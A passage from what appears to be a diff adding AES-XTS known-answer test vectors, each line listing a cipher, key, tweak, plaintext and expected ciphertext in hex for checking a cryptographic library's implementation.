27a7479befa1d476489f308cd4cfa6e2a96e4bbe3208ff25287dd3819616e89cc78cf7f5e543445f8333d8fa7f56000005279fa5d8b5e4ad40e736ddb4d35412328063fd2aab53e5ea1e0a9f332500a5df9487d07a5c92cc512c8866c7e860ce93fdf166a24912b422976146ae20ce846bb7dc9ba94a767aaef20c0d61ad02655ea92dc4c4e41a8952c651d33174be51a10c421110e6d81588ede82103a252d8a750e8768defffed9122810aaeb99f9172af82b604dc4b8e51bcb08235a6f4341332e4ca60482a4ba1a03b3e65008fc5da76b70bf1690db4eae29c5f1badd03c5ccf2a55d705ddcd86d449511ceb7ec30bf12b1fa35b913f9f747a8afd1b130e94bff94effd01a91735ca1726acd0b197c4e5b03393697e126826fb6bbde8ecc1e08298516e2c9ed03ff3c1b7860f6de76d4cecd94c8119855ef5297ca67e9f3e7ff72b1e99785ca0a7e7720c5b36dc6d72cac9574c8cbbc2f801e23e56fd344b07f22154beba0f08ce8891e643ed995c94d9a69c9f1b5f499027a78572aeebd74d20cc39881c213ee770b1010e4bea718846977ae119f7a023ab58cca0ad752afe656bb3c17256a9f6e9bf19fdd5a38fc82bbe872c5539edb609ef4f79c203ebb140f2e583cb2ad15b4aa5b655016a8449277dbd477ef2c8d6c017db738b18deb4a427d1923ce3ff262735779a418f20a282df920147beabe421ee5319d0568
+aes-128-xts:2718281828459045235360287471352631415926535897932384626433832795:01000000000000000000000000000000:27a7479befa1d476489f308cd4cfa6e2a96e4bbe3208ff25287dd3819616e89cc78cf7f5e543445f8333d8fa7f56000005279fa5d8b5e4ad40e736ddb4d35412328063fd2aab53e5ea1e0a9f332500a5df9487d07a5c92cc512c8866c7e860ce93fdf166a24912b422976146ae20ce846bb7dc9ba94a767aaef20c0d61ad02655ea92dc4c4e41a8952c651d33174be51a10c421110e6d81588ede82103a252d8a750e8768defffed9122810aaeb99f9172af82b604dc4b8e51bcb08235a6f4341332e4ca60482a4ba1a03b3e65008fc5da76b70bf1690db4eae29c5f1badd03c5ccf2a55d705ddcd86d449511ceb7ec30bf12b1fa35b913f9f747a8afd1b130e94bff94effd01a91735ca1726acd0b197c4e5b03393697e126826fb6bbde8ecc1e08298516e2c9ed03ff3c1b7860f6de76d4cecd94c8119855ef5297ca67e9f3e7ff72b1e99785ca0a7e7720c5b36dc6d72cac9574c8cbbc2f801e23e56fd344b07f22154beba0f08ce8891e643ed995c94d9a69c9f1b5f499027a78572aeebd74d20cc39881c213ee770b1010e4bea718846977ae119f7a023ab58cca0ad752afe656bb3c17256a9f6e9bf19fdd5a38fc82bbe872c5539edb609ef4f79c203ebb140f2e583cb2ad15b4aa5b655016a8449277dbd477ef2c8d6c017db738b18deb4a427d1923ce3ff262735779a418f20a282df920147beabe421ee5319d0568:264d3ca8512194fec312c8c9891f279fefdd608d0c027b60483a3fa811d65ee59d52d9e40ec5672d81532b38b6b089ce951f0f9c35590b8b978d175213f329bb1c2fd30f2f7f30492a61a532a79f51d36f5e31a7c9a12c286082ff7d2394d18f783e1a8e72c722caaaa52d8f065657d2631fd25bfd8e5baad6e527d763517501c68c5edc3cdd55435c532d7125c8614deed9adaa3acade5888b87bef641c4c994c8091b5bcd387f3963fb5bc37aa922fbfe3df4e5b915e6eb514717bdd2a74079a5073f5c4bfd46adf7d282e7a393a52579d11a028da4d9cd9c77124f9648ee383b1ac763930e7162a8d37f350b2f74b8472cf09902063c6b32e8c2d9290cefbd7346d1c779a0df50edcde4531da07b099c638e83a755944df2aef1aa31752fd323dcb710fb4bfbb9d22b925bc3577e1b8949e729a90bbafeacf7f7879e7b1147e28ba0bae940db795a61b15ecf4df8db07b824bb062802cc98a9545bb2aaeed77cb3fc6db15dcd7d80d7d5bc406c4970a3478ada8899b329198eb61c193fb6275aa8ca340344a75a862aebe92eee1ce032fd950b47d7704a3876923b4ad62844bf4a09c4dbe8b4397184b7471360c9564880aedddb9baa4af2e75394b08cd32ff479c57a07d3eab5d54de5f9738b8d27f27a9f0ab11799d7b7ffefb2704c95c6ad12c39f1e867a4b7b1d7818a4b753dfd2a89ccb45e001a03a867b187f225dd
+aes-128-xts:2718281828459045235360287471352631415926535897932384626433832795:02000000000000000000000000000000:264d3ca8512194fec312c8c9891f279fefdd608d0c027b60483a3fa811d65ee59d52d9e40ec5672d81532b38b6b089ce951f0f9c35590b8b978d175213f329bb1c2fd30f2f7f30492a61a532a79f51d36f5e31a7c9a12c286082ff7d2394d18f783e1a8e72c722caaaa52d8f065657d2631fd25bfd8e5baad6e527d763517501c68c5edc3cdd55435c532d7125c8614deed9adaa3acade5888b87bef641c4c994c8091b5bcd387f3963fb5bc37aa922fbfe3df4e5b915e6eb514717bdd2a74079a5073f5c4bfd46adf7d282e7a393a52579d11a028da4d9cd9c77124f9648ee383b1ac763930e7162a8d37f350b2f74b8472cf09902063c6b32e8c2d9290cefbd7346d1c779a0df50edcde4531da07b099c638e83a755944df2aef1aa31752fd323dcb710fb4bfbb9d22b925bc3577e1b8949e729a90bbafeacf7f7879e7b1147e28ba0bae940db795a61b15ecf4df8db07b824bb062802cc98a9545bb2aaeed77cb3fc6db15dcd7d80d7d5bc406c4970a3478ada8899b329198eb61c193fb6275aa8ca340344a75a862aebe92eee1ce032fd950b47d7704a3876923b4ad62844bf4a09c4dbe8b4397184b7471360c9564880aedddb9baa4af2e75394b08cd32ff479c57a07d3eab5d54de5f9738b8d27f27a9f0ab11799d7b7ffefb2704c95c6ad12c39f1e867a4b7b1d7818a4b753dfd2a89ccb45e001a03a867b187f225dd:fa762a3680b76007928ed4a4f49a9456031b704782e65e16cecb54ed7d017b5e18abd67b338e81078f21edb7868d901ebe9c731a7c18b5e6dec1d6a72e078ac9a4262f860beefa14f4e821018272e411a951502b6e79066e84252c3346f3aa62344351a291d4bedc7a07618bdea2af63145cc7a4b8d4070691ae890cd65733e7946e9021a1dffc4c59f159425ee6d50ca9b135fa6162cea18a939838dc000fb386fad086acce5ac07cb2ece7fd580b00cfa5e98589631dc25e8e2a3daf2ffdec26531659912c9d8f7a15e5865ea8fb5816d6207052bd7128cd743c12c8118791a4736811935eb982a532349e31dd401e0b660a568cb1a4711f552f55ded59f1f15bf7196b3ca12a91e488ef59d64f3a02bf45239499ac6176ae321c4a211ec545365971c5d3f4f09d4eb139bfdf2073d33180b21002b65cc9865e76cb24cd92c874c24c18350399a936ab3637079295d76c417776b94efce3a0ef7206b15110519655c956cbd8b2489405ee2b09a6b6eebe0c53790a12a8998378b33a5b71159625f4ba49d2a2fdba59fbf0897bc7aabd8d707dc140a80f0f309f835d3da54ab584e501dfa0ee977fec543f74186a802b9a37adb3e8291eca04d66520d229e60401e7282bef486ae059aa70696e0e305d777140a7a883ecdcb69b9ff938e8a4231864c69ca2c2043bed007ff3e605e014bcf518138dc3a25c5e236171a2d01d6
+aes-128-xts:2718281828459045235360287471352631415926535897932384626433832795:fd000000000000000000000000000000:8e41b78c390b5af9d758bb214a67e9f6bf7727b09ac6124084c37611398fa45daad94868600ed391fb1acd4857a95b466e62ef9f4b377244d1c152e7b30d731aad30c716d214b707aed99eb5b5e580b3e887cf7497465651d4b60e6042051da3693c3b78c14489543be8b6ad0ba629565bba202313ba7b0d0c94a3252b676f46cc02ce0f8a7d34c0ed229129673c1f61aed579d08a9203a25aac3a77e9db60267996db38df637356d9dcd1632e369939f2a29d89345c66e05066f1a3677aef18dea4113faeb629e46721a66d0a7e785d3e29af2594eb67dfa982affe0aac058f6e15864269b135418261fc3afb089472cf68c45dd7f231c6249ba0255e1e033833fc4d00a3fe02132d7bc3873614b8aee34273581ea0325c81f0270affa13641d052d36f0757d484014354d02d6883ca15c24d8c3956b1bd027bcf41f151fd8023c5340e5606f37e90fdb87c86fb4fa634b3718a30bace06a66eaf8f63c4aa3b637826a87fe8cfa44282e92cb1615af3a28e53bc74c7cba1a0977be9065d0c1a5dec6c54ae38d37f37aa35283e048e5530a85c4e7a29d7b92ec0c3169cdf2a805c7604bce60049b9fb7b8eaac10f51ae23794ceba68bb58112e293b9b692ca721b37c662f8574ed4dba6f88e170881c82cddc1034a0ca7e284bf0962b6b26292d836fa9f73c1ac770eef0f2d3a1eaf61d3e03555fd424eedd67e18a18094f888:d55f684f81f4426e9fde92a5ff02df2ac896af63962888a97910c1379e20b0a3b1db613fb7fe2e07004329ea5c22bfd33e3dbe4cf58cc608c2c26c19a2e2fe22f98732c2b5cb844cc6c0702d91e1d50fc4382a7eba5635cd602432a2306ac4ce82f8d70c8d9bc15f918fe71e74c622d5cf71178bf6e0b9cc9f2b41dd8dbe441c41cd0c73a6dc47a348f6702f9d0e9b1b1431e948e299b9ec2272ab2c5f0c7be86affa5dec87a0bee81d3d50007edaa2bcfccb35605155ff36ed8edd4a40dcd4b243acd11b2b987bdbfaf91a7cac27e9c5aea525ee53de7b2d3332c8644402b823e94a7db26276d2d23aa07180f76b4fd29b9c0823099c9d62c519880aee7e9697617c1497d47bf3e571950311421b6b734d38b0db91eb85331b91ea9f61530f54512a5a52a4bad589eb69781d537f23297bb459bdad2948a29e1550bf4787e0be95bb173cf5fab17dab7a13a052a63453d97ccec1a321954886b7a1299faaeecae35c6eaaca753b041b5e5f093bf83397fd21dd6b3012066fcc058cc32c3b09d7562dee29509b5839392c9ff05f51f3166aaac4ac5f238038a3045e6f72e48ef0fe8bc675e82c318a268e43970271bf119b81bf6a982746554f84e72b9f00280a320a08142923c23c883423ff949827f29bbacdc1ccdb04938ce6098c95ba6b32528f4ef78eed778b2e122ddfd1cbdd11d1c0a6783e011fc536d63d053260637
+aes-128-xts:2718281828459045235360287471352631415926535897932384626433832795:fe000000000000000000000000000000:d55f684f81f4426e9fde92a5ff02df2ac896af63962888a97910c1379e20b0a3b1db613fb7fe2e07004329ea5c22bfd33e3dbe4cf58cc608c2c26c19a2e2fe22f98732c2b5cb844cc6c0702d91e1d50fc4382a7eba5635cd602432a2306ac4ce82f8d70c8d9bc15f918fe71e74c622d5cf71178bf6e0b9cc9f2b41dd8dbe441c41cd0c73a6dc47a348f6702f9d0e9b1b1431e948e299b9ec2272ab2c5f0c7be86affa5dec87a0bee81d3d50007edaa2bcfccb35605155ff36ed8edd4a40dcd4b243acd11b2b987bdbfaf91a7cac27e9c5aea525ee53de7b2d3332c8644402b823e94a7db26276d2d23aa07180f76b4fd29b9c0823099c9d62c519880aee7e9697617c1497d47bf3e571950311421b6b734d38b0db91eb85331b91ea9f61530f54512a5a52a4bad589eb69781d537f23297bb459bdad2948a29e1550bf4787e0be95bb173cf5fab17dab7a13a052a63453d97ccec1a321954886b7a1299faaeecae35c6eaaca753b041b5e5f093bf83397fd21dd6b3012066fcc058cc32c3b09d7562dee29509b5839392c9ff05f51f3166aaac4ac5f238038a3045e6f72e48ef0fe8bc675e82c318a268e43970271bf119b81bf6a982746554f84e72b9f00280a320a08142923c23c883423ff949827f29bbacdc1ccdb04938ce6098c95ba6b32528f4ef78eed778b2e122ddfd1cbdd11d1c0a6783e011fc536d63d053260637:72efc1ebfe1ee25975a6eb3aa8589dda2b261f1c85bdab442a9e5b2dd1d7c3957a16fc08e526d4b1223f1b1232a11af274c3d70dac57f83e0983c498f1a6f1aecb021c3e70085a1e527f1ce41ee5911a82020161529cd82773762daf5459de94a0a82adae7e1703c808543c29ed6fb32d9e004327c1355180c995a07741493a09c21ba01a387882da4f62534b87bb15d60d197201c0fd3bf30c1500a3ecfecdd66d8721f90bcc4c17ee925c61b0a03727a9c0d5f5ca462fbfa0af1c2513a9d9d4b5345bd27a5f6e653f751693e6b6a2b8ead57d511e00e58c45b7b8d005af79288f5c7c22fd4f1bf7a898b03a5634c6a1ae3f9fae5de4f296a2896b23e7ed43ed14fa5a2803f4d28f0d3ffcf24757677aebdb47bb388378708948a8d4126ed1839e0da29a537a8c198b3c66ab00712dd261674bf45a73d67f76914f830ca014b65596f27e4cf62de66125a5566df9975155628b400fbfb3a29040ed50faffdbb18aece7c5c44693260aab386c0a37b11b114f1c415aebb653be468179428d43a4d8bc3ec38813eca30a13cf1bb18d524f1992d44d8b1a42ea30b22e6c95b199d8d182f8840b09d059585c31ad691fa0619ff038aca2c39a943421157361717c49d322028a74648113bd8c9d7ec77cf3c89c1ec8718ceff8516d96b34c3c614f10699c9abc4ed0411506223bea16af35c883accdbe1104eef0cfdb54e12fb230a
+aes-128-xts:2718281828459045235360287471352631415926535897932384626433832795:ff000000000000000000000000000000:72efc1ebfe1ee25975a6eb3aa8589dda2b261f1c85bdab442a9e5b2dd1d7c3957a16fc08e526d4b1223f1b1232a11af274c3d70dac57f83e0983c498f1a6f1aecb021c3e70085a1e527f1ce41ee5911a82020161529cd82773762daf5459de94a0a82adae7e1703c808543c29ed6fb32d9e004327c1355180c995a07741493a09c21ba01a387882da4f62534b87bb15d60d197201c0fd3bf30c1500a3ecfecdd66d8721f90bcc4c17ee925c61b0a03727a9c0d5f5ca462fbfa0af1c2513a9d9d4b5345bd27a5f6e653f751693e6b6a2b8ead57d511e00e58c45b7b8d005af79288f5c7c22fd4f1bf7a898b03a5634c6a1ae3f9fae5de4f296a2896b23e7ed43ed14fa5a2803f4d28f0d3ffcf24757677aebdb47bb388378708948a8d4126ed1839e0da29a537a8c198b3c66ab00712dd261674bf45a73d67f76914f830ca014b65596f27e4cf62de66125a5566df9975155628b400fbfb3a29040ed50faffdbb18aece7c5c44693260aab386c0a37b11b114f1c415aebb653be468179428d43a4d8bc3ec38813eca30a13cf1bb18d524f1992d44d8b1a42ea30b22e6c95b199d8d182f8840b09d059585c31ad691fa0619ff038aca2c39a943421157361717c49d322028a74648113bd8c9d7ec77cf3c89c1ec8718ceff8516d96b34c3c614f10699c9abc4ed0411506223bea16af35c883accdbe1104eef0cfdb54e12fb230a:3260ae8dad1f4a32c5cafe3ab0eb95549d461a67ceb9e5aa2d3afb62dece0553193ba50c75be251e08d1d08f1088576c7efdfaaf3f459559571e12511753b07af073f35da06af0ce0bbf6b8f5ccc5cea500ec1b211bd51f63b606bf6528796ca12173ba39b8935ee44ccce646f90a45bf9ccc567f0ace13dc2d53ebeedc81f58b2e41179dddf0d5a5c42f5d8506c1a5d2f8f59f3ea873cbcd0eec19acbf325423bd3dcb8c2b1bf1d1eaed0eba7f0698e4314fbeb2f1566d1b9253008cbccf45a2b0d9c5c9c21474f4076e02be26050b99dee4fd68a4cf890e496e4fcae7b70f94ea5a9062da0daeba1993d2ccd1dd3c244b8428801495a58b216547e7e847c46d1d756377b6242d2e5fb83bf752b54e0df71e889f3a2bb0f4c10805bf3c590376e3c24e22ff57f7fa965577375325cea5d920db94b9c336b455f6e894c01866fe9fbb8c8d3f70a2957285f6dfb5dcd8cbf54782f8fe7766d4723819913ac773421e3a31095866bad22c86a6036b2518b2059b4229d18c8c2ccbdf906c6cc6e82464ee57bddb0bebcb1dc645325bfb3e665ef7251082c88ebb1cf203bd779fdd38675713c8daadd17e1cabee432b09787b6ddf3304e38b731b45df5df51b78fcfb3d32466028d0ba36555e7e11ab0ee0666061d1645d962444bc47a38188930a84b4d561395c73c087021927ca638b7afc8a8679ccb84c26555440ec7f10445cd
+
+aes-256-xts:27182818284590452353602874713526624977572470936999595749669676273141592653589793238462643383279502884197169399375105820974944592:ff000000000000000000000000000000:000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff:1c3b3a102f770386e4836c99e370cf9bea00803f5e482357a4ae12d414a3e63b5d31e276f8fe4a8d66b317f9ac683f44680a86ac35adfc3345befecb4bb188fd5776926c49a3095eb108fd1098baec70aaa66999a72a82f27d848b21d4a741b0c5cd4d5fff9dac89aeba122961d03a757123e9870f8acf1000020887891429ca2a3e7a7d7df7b10355165c8b9a6d0a7de8b062c4500dc4cd120c0f7418dae3d0b5781c34803fa75421c790dfe1de1834f280d7667b327f6c8cd7557e12ac3a0f93ec05c52e0493ef31a12d3d9260f79a289d6a379bc70c50841473d1a8cc81ec583e9645e07b8d9670655ba5bbcfecc6dc3966380ad8fecb17b6ba02469a020a84e18e8f84252070c13e9f1f289be54fbc481457778f616015e1327a02b140f1505eb309326d68378f8374595c849d84f4c333ec4423885143cb47bd71c5edae9be69a2ffeceb1bec9de244fbe15992b11b77c040f12bd8f6a975a44a0f90c29a9abc3d4d893927284c58754cce294529f8614dcd2aba991925fedc4ae74ffac6e333b93eb4aff0479da9a410e4450e0dd7ae4c6e2910900575da401fc07059f645e8b7e9bfdef33943054ff84011493c27b3429eaedb4ed5376441a77ed43851ad77f16f541dfd269d50d6a5f14fb0aab1cbb4c1550be97f7ab4066193c4caa773dad38014bd2092fa755c824bb5e54c4f36ffda9fcea70b9c6e693e148c151
+aes-256-xts:27182818284590452353602874713526624977572470936999595749669676273141592653589793238462643383279502884197169399375105820974944592:ffff0000000000000000000000000000:000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff:77a31251618a15e6b92d1d66dffe7b50b50bad552305ba0217a610688eff7e11e1d0225438e093242d6db274fde801d4cae06f2092c728b2478559df58e837c2469ee4a4fa794e4bbc7f39bc026e3cb72c33b0888f25b4acf56a2a9804f1ce6d3d6e1dc6ca181d4b546179d55544aa7760c40d06741539c7e3cd9d2f6650b2013fd0eeb8c2b8e3d8d240ccae2d4c98320a7442e1c8d75a42d6e6cfa4c2eca1798d158c7aecdf82490f24bb9b38e108bcda12c3faf9a21141c3613b58367f922aaa26cd22f23d708dae699ad7cb40a8ad0b6e2784973dcb605684c08b8d6998c69aac049921871ebb65301a4619ca80ecb485a31d744223ce8ddc2394828d6a80470c092f5ba413c3378fa6054255c6f9df4495862bbb3287681f931b687c888abf844dfc8fc28331e579928cd12bd2390ae123cf03818d14dedde5c0c24c8ab018bfca75ca096f2d531f3d1619e785f1ada437cab92e980558b3dce1474afb75bfedbf8ff54cb2618e0244c9ac0d3c66fb51598cd2db11f9be39791abe447c63094f7c453b7ff87cb5bb36b7c79efb0872d17058b83b15ab0866ad8a58656c5a7e20dbdf308b2461d97c0ec0024a2715055249cf3b478ddd4740de654f75ca686e0d7345c69ed50cdc2a8b332b1f8824108ac937eb050585608ee734097fc09054fbff89eeaeea791f4a7ab1f9868294a4f9e27b42af8100cb9d59cef9645803
+aes-256-xts:27182818284590452353602874713526624977572470936999595749669676273141592653589793238462643383279502884197169399375105820974944592:ffffff00000000000000000000000000:000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff:e387aaa58ba483afa7e8eb469778317ecf4cf573aa9d4eac23f2cdf914e4e200a8b490e42ee646802dc6ee2b471b278195d60918ececb44bf79966f83faba0499298ebc699c0c8634715a320bb4f075d622e74c8c932004f25b41e361025b5a87815391f6108fc4afa6a05d9303c6ba68a128a55705d415985832fdeaae6c8e19110e84d1b1f199a2692119edc96132658f09da7c623efcec712537a3d94c0bf5d7e352ec94ae5797fdb377dc1551150721adf15bd26a8efc2fcaad56881fa9e62462c28f30ae1ceaca93c345cf243b73f542e2074a705bd2643bb9f7cc79bb6e7091ea6e232df0f9ad0d6cf502327876d82207abf2115cdacf6d5a48f6c1879a65b115f0f8b3cb3c59d15dd8c769bc014795a1837f3901b5845eb491adfefe097b1fa30a12fc1f65ba22905031539971a10f2f36c321bb51331cdefb39e3964c7ef079994f5b69b2edd83a71ef549971ee93f44eac3938fcdd61d01fa71799da3a8091c4c48aa9ed263ff0749df95d44fef6a0bb578ec69456aa5408ae32c7af08ad7ba8921287e3bbee31b767be06a0e705c864a769137df28292283ea81a2480241b44d9921cdbec1bc28dc1fda114bd8e5217ac9d8ebafa720e9da4f9ace231cc949e5b96fe76ffc21063fddc83a6b8679c00d35e09576a875305bed5f36ed242c8900dd1fa965bc950dfce09b132263a1eef52dd6888c309f5a7d712826
+aes-256-xts:27182818284590452353602874713526624977572470936999595749669676273141592653589793238462643383279502884197169399375105820974944592:ffffffff000000000000000000000000:000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff:bf53d2dade78e822a4d949a9bc6766b01b06a8ef70d26748c6a7fc36d80ae4c5520f7c4ab0ac8544424fa405162fef5a6b7f229498063618d39f0003cb5fb8d1c86b643497da1ff945c8d3bedeca4f479702a7a735f043ddb1d6aaade3c4a0ac7ca7f3fa5279bef56f82cd7a2f38672e824814e10700300a055e1630b8f1cb0e919f5e942010a416e2bf48cb46993d3cb6a51c19bacf864785a00bc2ecff15d350875b246ed53e68be6f55bd7e05cfc2b2ed6432198a6444b6d8c247fab941f569768b5c429366f1d3f00f0345b96123d56204c01c63b22ce78baf116e525ed90fdea39fa469494d3866c31e05f295ff21fea8d4e6e13d67e47ce722e9698a1c1048d68ebcde76b86fcf976eab8aa9790268b7068e017a8b9b749409514f1053027fd16c3786ea1bac5f15cb79711ee2abe82f5cf8b13ae73030ef5b9e4457e75d1304f988d62dd6fc4b94ed38ba831da4b7634971b6cd8ec325d9c61c00f1df73627ed3745a5e8489f3a95c69639c32cd6e1d537a85f75cc844726e8a72fc0077ad22000f1d5078f6b866318c668f1ad03d5a5fced5219f2eabbd0aa5c0f460d183f04404a0d6f469558e81fab24a167905ab4c7878502ad3e38fdbe62a41556cec37325759533ce8f25f367c87bb5578d667ae93f9e2fd99bcbc5f2fbba88cf6516139420fcff3b7361d86322c4bd84c82f335abb152c4a93411373aaa8220
+aes-256-xts:27182818284590452353602874713526624977572470936999595749669676273141592653589793238462643383279502884197169399375105820974944592:ffffffffff0000000000000000000000:000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff:64497e5a831e4a932c09be3e5393376daa599548b816031d224bbf50a818ed2350eae7e96087c8a0db51ad290bd00c1ac1620857635bf246c176ab463be30b808da548081ac847b158e1264be25bb0910bbc92647108089415d45fab1b3d2604e8a8eff1ae4020cfa39936b66827b23f371b92200be90251e6d73c5f86de5fd4a950781933d79a28272b782a2ec313efdfcc0628f43d744c2dc2ff3dcb66999b50c7ca895b0c64791eeaa5f29499fb1c026f84ce5b5c72ba1083cddb5ce45434631665c333b60b11593fb253c5179a2c8db813782a004856a1653011e93fb6d876c18366dd8683f53412c0c180f9c848592d593f8609ca736317d356e13e2bff3a9f59cd9aeb19cd482593d8c46128bb32423b37a9adfb482b99453fbe25a41bf6feb4aa0bef5ed24bf73c762978025482c13115e4015aac992e5613a3b5c2f685b84795cb6e9b2656d8c88157e52c42f978d8634c43d06fea928f2822e465aa6576e9bf419384506cc3ce3c54ac1a6f67dc66f3b30191e698380bc999b05abce19dc0c6dcc2dd001ec535ba18deb2df1a101023108318c75dc98611a09dc48a0acdec676fabdf222f07e026f059b672b56e5cbc8e1d21bbd867dd927212054681d70ea737134cdfce93b6f82ae22423274e58a0821cc5502e2d0ab4585e94de6975be5e0b4efce51cd3e70c25a1fbbbd609d273ad5b0d59631c531f6a0a57b9
+
+aes-128-xts:fffefdfcfbfaf9f8f7f6f5f4f3f2f1f0bfbebdbcbbbab9b8b7b6b5b4b3b2b1b0:9a785634120000000000000000000000:000102030405060708090a0b0c0d0e0f10:6c1625db4671522d3d7599601de7ca09ed
